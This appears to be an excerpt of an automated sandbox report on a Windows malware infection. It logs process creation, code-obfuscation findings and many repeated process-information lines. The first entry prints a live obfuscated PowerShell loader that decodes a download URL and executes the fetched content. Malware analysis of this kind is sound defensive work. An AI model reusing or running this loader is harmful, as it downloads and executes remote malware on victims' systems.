Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B8A09AD push E85E515Dh; ret	1_2_00007FFD9B8A09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B9771C8 push esp; retf	1_2_00007FFD9B9771C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078D08C2 push eax; mov dword ptr [esp], ecx	4_2_078D0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078DB144 push 8B6B39BFh; iretd	4_2_078DB149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_078D0AB8 push eax; mov dword ptr [esp], ecx	4_2_078D0AC4

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
